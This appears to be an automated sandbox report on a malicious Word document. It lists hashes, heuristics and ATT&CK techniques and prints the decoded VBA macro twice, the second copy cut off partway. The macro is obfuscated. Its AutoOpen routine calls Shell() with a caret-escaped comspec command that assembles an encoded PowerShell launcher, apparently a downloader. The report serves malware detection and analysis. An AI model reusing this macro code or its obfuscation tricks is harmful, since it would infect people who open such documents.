Office (OLE) malware analysis — malicious · d4839df61767bb98

MALICIOUS

Office (OLE)

114.0 KB Created: 2018-06-06 13:32:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: ef98e92e828c270f91ecc2dced3fd7e6 SHA-1: e7389a7dddec0fe8ff631761a0588e9f5fbfce74 SHA-256: d4839df61767bb98251f72f783f7d0b3270ed942e978f36b7f7f94d2a4fda876

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro calls the Shell() function, which is used to execute a command. The reconstructed command string 'md ipJNOwDDK RKjQkjWTVqOwqPvNfhPVWDwJ & %^c^o^m^S^p^E^c^% %^c^' suggests an attempt to download and execute a second-stage payload, likely a downloader or dropper. The presence of the Shell() call and the AutoOpen execution token strongly indicate malicious intent.

Heuristics 7

ClamAV: Doc.Malware.Donoff-7111879-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Donoff-7111879-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14184 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14184 bytes
SHA-256: `b2b769392c35a5a95b527bf86f9a1af1a3aad5e836f1414e75a9fc6a5cca4c4d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZOODzDvdiUtNfz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function TriuhBMCU() On Error Resume Next GfDsO = CStr(TitmT * Tan(DiYlL * Int(FGiXc * Sqr(27805) / zfoZRq + Fix(42103)) / 15996 * Round(18567 / Log(61169 - YcZpbw) + 58788 - oNIwi)) / 28648 + CByte(52207)) ADqjC = CStr(JQXfFc * Tan(zDuCiN * Int(mPifsR * Sqr(50444) / phGKq + Fix(53086)) / 41364 * Round(9735 / Log(37218 - mjSISw) + 88301 - OqJOv)) / 99431 + CByte(2447)) TriuhBMCU = atBIWfh + Shell(clSrP + Chr(ncnwwoSTau + vbKeyC + mzhkCX) + MMwpCbjG + dSswSX + tLhdu + fPBKSYi + fwXNbS + zEUiPmw + RvJDPcbd, 18446 - 18446) dkYKql = CStr(nbpZu * Tan(UcwaFw * Int(Qdwhlq * Sqr(6088) / LalGIw + Fix(97275)) / 70235 * Round(61929 / Log(17228 - BUijd) + 45895 - PuOLnp)) / 6719 + CByte(44129)) End Function Sub Autoopen() On Error Resume Next zorYAh = CStr(cBDSmo * Tan(rRRAu * Int(lwTJm * Sqr(51398) / VzmvC + Fix(72891)) / 43202 * Round(97883 / Log(92660 - kETpCf) + 49213 - MbYWt)) / 41794 + CByte(79707)) TriuhBMCU NpDUh = CStr(ZZJcOH * Tan(ARWvd * Int(vbUjQt * Sqr(8649) / zkzFRG + Fix(88715)) / 47578 * Round(62438 / Log(91530 - HziujZ) + 33038 - pMJBa)) / 32115 + CByte(77601)) End Sub Attribute VB_Name = "htGmbdLaoJWzBV" Function MMwpCbjG() On Error Resume Next ZdvIrh = CStr(IBGUpd * Tan(MuVzM * Int(XaBha * Sqr(20895) / LAYkvS + Fix(29794)) / 71218 * Round(56266 / Log(98672 - VSLiP) + 92567 - mSisMT)) / 72433 + CByte(27746)) MBNjqptlt = "md " + "ipJNOwDDK RKjQ" + "kjWTVqOwqPvNf" + "nSZu zAPD" + "hPVWDwJ & " + " %" + "^c^o^m^S^p" + "^E^c^% %^c^" DwcOh = CStr(BjHcVY * Tan(NXjuC * Int(uIpLFw * Sqr(77139) / zTnFzh + Fix(15077)) / 23436 * Round(73795 / Log(1306 - loQcam) + 51512 - OFLIR)) / 32600 + CByte(14135)) oqUIMaIqoit = "o^" + "m^S^p^E^c^%" + " /V" + " " + " /c " + " set %nQRbUjA" + "TPw" + "BmzuI%=j" BNmXR = CStr(oDPUWW * Tan(PBkiKQ * Int(djPYik * Sqr(49287) / mLWorN + Fix(11478)) / 97009 * Round(99010 / Log(56392 - rzNMG) + 31483 - UwDaa)) / 14668 + CByte(12)) DEqQipK = "YQsUWij" + "Q&&set %CFb" + "bTl" + "AVQc%=p&&" + "set %NhQizpO" pVwOs = CStr(UBQEwh * Tan(iJClFq * Int(pQTII * Sqr(49585) / bjMkO + Fix(78348)) / 50613 * Round(45189 / Log(69656 - lklXww) + 16784 - iapoA)) / 78881 + CByte(39744)) XzYGMFjb = "Brj" + "IZE%=o^w&&s" + "et %VfpDzU" + "KAjbodmLD%=Gfi" abZCp = CStr(TRtSD * Tan(jtDGZ * Int(zUECr * Sqr(38348) / AZzam + Fix(65762)) / 45376 * Round(31415 / Log(95515 - wwhKf) + 33244 - ifspY)) / 79739 + CByte(43243)) LGYtC = "wNPJYw&&set" + " %ORIKBzrpv" + "P%=!%CFbbTlAVQc" + "%!&&set %mwnEpQ" + "hiKwELPPc%=lTS" + "TpzMMaOrDm&&se" + "t %W" + "hiXwnAZuwT" + "jjD%=e^r&&set " + "%lYDkljitIBo" OzpzLY = CStr(FsofTr * Tan(kjCli * Int(IssTD * Sqr(70194) / MbUck + Fix(55550)) / 82638 * Round(45072 / Log(69711 - QlpOtp) + 40955 - zdXvM)) / 74158 + CByte(74351)) dIADXlovcF = "JB%=!%NhQiz" + "pOBrjIZE%!" + "&&set %srS" + "ioGl%=s&" + "&set %CGWQHNW" + "WwqKHvbN%=GqQ" + "CF" RaWFV = CStr(bAXiXM * Tan(qAjAzm * Int(pqPCX * Sqr(38072) / HAQOi + Fix(79724)) / 49806 * Round(22403 / Log(31732 - fNUKp) + 82637 - SIEGc)) / 76769 + CByte(90866)) tvkOBBdiCR = "cvqEGolbd&&set " + "%imLEWflu" + "%=he&&set %WfzD" + "SzTos" + "on%=ll&&" + "!%ORIKBzr" + "pvP%!!%lYD" MMwpCbjG = MBNjqptlt + oqUIMaIqoit + DEqQipK + XzYGMFjb + LGYtC + dIADXlovcF + tvkOBBdiCR End Function Function dSswSX() On Error Resume Next AmVaL = CStr(hBpTz * Tan(PoXVf * Int(iUkRpz * Sqr(99016) / kPOzi + Fix(24744)) / 41345 * Round(241 / Log(65598 - EkFjz) + 22755 - qpjzdl)) / 68626 + CByte(52743)) TRWuBU = "kljitIBoJB%!!%" + "WhiXwnAZu" + "wTjjD%!!%sr" + "SioGl%!!%imLEWf" + "lu%!!%WfzDS" FadizV = CStr(KjSmqp * Tan(lPGUQu * Int(CXYmwJ * Sqr(29977) / GdfYl + Fix(14897)) / 90860 * Round(42832 / Log(99016 - iJuwi) + 48543 - BDwkWQ)) / 36233 + CByte(63591)) VXRMS = "zToson%! -e " + "IA" + "AoACA" + "ATgB" + "lAFcALQBPAE" + "IAagBlAEMAVAAgA ... (truncated)

SHA-256: b2b769392c35a5a95b527bf86f9a1af1a3aad5e836f1414e75a9fc6a5cca4c4d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZOODzDvdiUtNfz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TriuhBMCU()
On Error Resume Next
GfDsO = CStr(TitmT * Tan(DiYlL * Int(FGiXc * Sqr(27805) / zfoZRq + Fix(42103)) / 15996 * Round(18567 / Log(61169 - YcZpbw) + 58788 - oNIwi)) / 28648 + CByte(52207))
ADqjC = CStr(JQXfFc * Tan(zDuCiN * Int(mPifsR * Sqr(50444) / phGKq + Fix(53086)) / 41364 * Round(9735 / Log(37218 - mjSISw) + 88301 - OqJOv)) / 99431 + CByte(2447))
TriuhBMCU = atBIWfh + Shell(clSrP + Chr(ncnwwoSTau + vbKeyC + mzhkCX) + MMwpCbjG + dSswSX + tLhdu + fPBKSYi + fwXNbS + zEUiPmw + RvJDPcbd, 18446 - 18446)
dkYKql = CStr(nbpZu * Tan(UcwaFw * Int(Qdwhlq * Sqr(6088) / LalGIw + Fix(97275)) / 70235 * Round(61929 / Log(17228 - BUijd) + 45895 - PuOLnp)) / 6719 + CByte(44129))
End Function
Sub Autoopen()
On Error Resume Next
zorYAh = CStr(cBDSmo * Tan(rRRAu * Int(lwTJm * Sqr(51398) / VzmvC + Fix(72891)) / 43202 * Round(97883 / Log(92660 - kETpCf) + 49213 - MbYWt)) / 41794 + CByte(79707))
TriuhBMCU
NpDUh = CStr(ZZJcOH * Tan(ARWvd * Int(vbUjQt * Sqr(8649) / zkzFRG + Fix(88715)) / 47578 * Round(62438 / Log(91530 - HziujZ) + 33038 - pMJBa)) / 32115 + CByte(77601))
End Sub


Attribute VB_Name = "htGmbdLaoJWzBV"
Function MMwpCbjG()
On Error Resume Next
ZdvIrh = CStr(IBGUpd * Tan(MuVzM * Int(XaBha * Sqr(20895) / LAYkvS + Fix(29794)) / 71218 * Round(56266 / Log(98672 - VSLiP) + 92567 - mSisMT)) / 72433 + CByte(27746))
MBNjqptlt = "md " + "ipJNOwDDK RKjQ" + "kjWTVqOwqPvNf" + "nSZu zAPD" + "hPVWDwJ & " + "    %" + "^c^o^m^S^p" + "^E^c^%     %^c^"
DwcOh = CStr(BjHcVY * Tan(NXjuC * Int(uIpLFw * Sqr(77139) / zTnFzh + Fix(15077)) / 23436 * Round(73795 / Log(1306 - loQcam) + 51512 - OFLIR)) / 32600 + CByte(14135))
oqUIMaIqoit = "o^" + "m^S^p^E^c^%" + "     /V" + "       " + "  /c         " + "  set %nQRbUjA" + "TPw" + "BmzuI%=j"
BNmXR = CStr(oDPUWW * Tan(PBkiKQ * Int(djPYik * Sqr(49287) / mLWorN + Fix(11478)) / 97009 * Round(99010 / Log(56392 - rzNMG) + 31483 - UwDaa)) / 14668 + CByte(12))
DEqQipK = "YQsUWij" + "Q&&set %CFb" + "bTl" + "AVQc%=p&&" + "set %NhQizpO"
pVwOs = CStr(UBQEwh * Tan(iJClFq * Int(pQTII * Sqr(49585) / bjMkO + Fix(78348)) / 50613 * Round(45189 / Log(69656 - lklXww) + 16784 - iapoA)) / 78881 + CByte(39744))
XzYGMFjb = "Brj" + "IZE%=o^w&&s" + "et %VfpDzU" + "KAjbodmLD%=Gfi"
abZCp = CStr(TRtSD * Tan(jtDGZ * Int(zUECr * Sqr(38348) / AZzam + Fix(65762)) / 45376 * Round(31415 / Log(95515 - wwhKf) + 33244 - ifspY)) / 79739 + CByte(43243))
LGYtC = "wNPJYw&&set" + " %ORIKBzrpv" + "P%=!%CFbbTlAVQc" + "%!&&set %mwnEpQ" + "hiKwELPPc%=lTS" + "TpzMMaOrDm&&se" + "t %W" + "hiXwnAZuwT" + "jjD%=e^r&&set " + "%lYDkljitIBo"
OzpzLY = CStr(FsofTr * Tan(kjCli * Int(IssTD * Sqr(70194) / MbUck + Fix(55550)) / 82638 * Round(45072 / Log(69711 - QlpOtp) + 40955 - zdXvM)) / 74158 + CByte(74351))
dIADXlovcF = "JB%=!%NhQiz" + "pOBrjIZE%!" + "&&set %srS" + "ioGl%=s&" + "&set %CGWQHNW" + "WwqKHvbN%=GqQ" + "CF"
RaWFV = CStr(bAXiXM * Tan(qAjAzm * Int(pqPCX * Sqr(38072) / HAQOi + Fix(79724)) / 49806 * Round(22403 / Log(31732 - fNUKp) + 82637 - SIEGc)) / 76769 + CByte(90866))
tvkOBBdiCR = "cvqEGolbd&&set " + "%imLEWflu" + "%=he&&set %WfzD" + "SzTos" + "on%=ll&&" + "!%ORIKBzr" + "pvP%!!%lYD"
MMwpCbjG = MBNjqptlt + oqUIMaIqoit + DEqQipK + XzYGMFjb + LGYtC + dIADXlovcF + tvkOBBdiCR
End Function
Function dSswSX()
On Error Resume Next
AmVaL = CStr(hBpTz * Tan(PoXVf * Int(iUkRpz * Sqr(99016) / kPOzi + Fix(24744)) / 41345 * Round(241 / Log(65598 - EkFjz) + 22755 - qpjzdl)) / 68626 + CByte(52743))
TRWuBU = "kljitIBoJB%!!%" + "WhiXwnAZu" + "wTjjD%!!%sr" + "SioGl%!!%imLEWf" + "lu%!!%WfzDS"
FadizV = CStr(KjSmqp * Tan(lPGUQu * Int(CXYmwJ * Sqr(29977) / GdfYl + Fix(14897)) / 90860 * Round(42832 / Log(99016 - iJuwi) + 48543 - BDwkWQ)) / 36233 + CByte(63591))
VXRMS = "zToson%!  -e " + "IA" + "AoACA" + "ATgB" + "lAFcALQBPAE" + "IAagBlAEMAVAAgA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.